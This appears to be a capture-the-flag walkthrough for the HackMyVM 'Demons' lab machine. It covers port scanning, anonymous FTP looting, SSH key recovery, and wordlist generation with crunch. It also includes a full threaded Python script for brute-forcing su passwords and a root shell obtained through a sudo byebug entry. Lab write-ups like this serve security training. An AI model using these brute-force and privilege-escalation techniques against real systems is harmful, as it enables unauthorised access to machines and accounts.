https://hackmyvm.eu/machines/machine.php?vm=Demons
Find IP of the machine.
~ sudo arp-scan --interface eth1 192.168.56.0/24
...
192.168.56.218 08:00:27:71:4c:b6 PCS Systemtechnik GmbH
~ nmap -sV -sC -p- 192.168.56.218 -oN ports.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-21 08:42 CST
Nmap scan report for 192.168.56.218
Host is up (0.00090s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.150
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 5e:44:8a:b1:77:0c:42:79:16:64:8d:af:b4:78:bb:b4 (RSA)
| 256 cb:0f:a7:df:7f:23:78:5a:08:e3:4f:b6:43:7c:11:84 (ECDSA)
|_ 256 a0:4a:26:bf:40:08:68:c2:b1:04:88:b4:8b:a2:45:2f (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: DemonsCloseCall
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Login ftp anonymous, download DemonsVBAMacroTools.mdb.
ftp> cd .toolsHidden
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Sep 16 15:17 .
drwxr-xr-x 3 0 115 4096 Sep 16 15:18 ..
-rw-r--r-- 1 0 0 55 Sep 10 17:21 .what
-rw------- 1 1000 1000 12018 Sep 10 17:19 DemonsCellsDogma.xlsx
-rwxrwxrwx 1 1000 1000 339968 Sep 16 15:17 DemonsVBAMacroTools.mdb
Use Access to open it, there is a VBA module which is password protected.
Google the way to bypass the password. Then we can view the source code.
Save the ssh key to key.txt.
Enum port 80. At http://ip/hell, get 2 usernames.
Try login as aim with the private key.
~ ssh aim@192.168.56.218 -i key.txt
Last login: Tue Sep 21 04:52:35 2021 from 192.168.56.150
aim@Demons:~$ id
uid=1001(aim) gid=1001(aim) groups=1001(aim)
Found an image in /home/aim, named key8_8.jpg. This the the hint for password of another user agares.
Check the keyboard image, "34odfnm" is different. This means the dic contains only these 7 letters/numbers.
8_8 may means password length is 8. We should use "crunch 8 8"
So, first we generate a dic with crunch, which contains 5764801 words.
~ crunch 8 8 dfnmo34 > tmp.txt
0
Crunch will now generate the following amount of data: 51883209 bytes
49 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 5764801
Because the password contain's all 7 letter/numbers, so there is one and only one letter/number appears twice.
Then we use a script to make the dic smaller. (Thanks avijneyam#8394 for the script )
with open("tmp.txt") as f:
lines = f.read().splitlines()
data = []
for line in lines:
uline = list(set([i for i in line]))
counts = []
for char in uline:
counts.append(line.count(char))
counts.sort()
if counts[-1] == 2 and counts[-2] == 1:
data.append(line)
data = "\n".join(data)
with open("dic.txt", "w") as f1:
f1.write(data)
The new dic contains only 141119 words. (Also a big one.)
~ wc -l dic.txt
141119 dic.txt
Then we need to brute force su to get the right password of agares.
There is a tool named sucrack at github.
https://github.com/hemp3l/sucrack
sucarck takes about 18 mins. (With 100 threads. Too many threads causes error.)
aim@Demons:~$ time ./sucrack -a -w 100 -u agares dic.txt
password is: xxxxxxxx
real 18m19.760s
user 11m7.012s
sys 4m59.095s
We can also make a python script to do the bruteforce. But the speed is mush slower than sucrack.
#!/usr/bin/python3
import threading
from subprocess import PIPE,STDOUT,Popen
threads = []
t_nums = 100 #number of threads
global correct_pass
correct_pass = ""
global current #current count of passwords
current = 0
global total #total count of passwords
total = 0
def crack_thread(*pass_list):
#threads of cracking su
global correct_pass
global current
global total
for pwd in pass_list:
if(len(correct_pass) > 0): #correct_pass has been found, exit thread
return
current += 1
print(f"{current}/{total}",end="\r")
p = Popen(['su','agares'],stdin=PIPE,stdout=PIPE,stderr=STDOUT)
try:
res=p.communicate(f"{pwd}\nid".encode("utf-8"))
except:
p.terminate()
continue
if(str(res).find("agares")) != -1:
print(f"\nPassword is {pwd}\n")
correct_pass = pwd
return
return
with open('mini.txt','r') as passfile:
passes = passfile.readlines()
total = len(passes)
t_size = total // t_nums #passwords count of each thread
t_last = total % t_nums #if mod is not 0, there will be another thread
for i in range(t_nums):
passblk = passes[i*t_size:(i+1)*t_size]
t=threading.Thread(target=crack_thread,args=passblk)
threads.append(t)
if t_last>0:
passblk = passes[t_size*t_nums:]
t=threading.Thread(target=crack_thread,args=passblk)
threads.append(t)
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()aim@Demons:~$ time python3 mt.py 126758/141120 Password is xxxxxxxx real 185m22.898s user 98m29.009s sys 62m7.093s
Check sudo -l as user agares.
agares@Demons:/home/aim$ sudo -l [sudo] password di agares: Corrispondenza voci Defaults per agares su Demons: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin L'utente agares può eseguire i seguenti comandi su Demons: (ALL : ALL) /bin/byebug
It's easy to get root now.
agares@Demons:~$ echo 'system("/bin/sh")' > tmp.rb
agares@Demons:~$ sudo byebug tmp.rb
[1, 1] in /home/agares/tmp.rb
=> 1: system("/bin/sh")
(byebug) continue
# id;hostname
uid=0(root) gid=0(root) gruppi=0(root)
Demons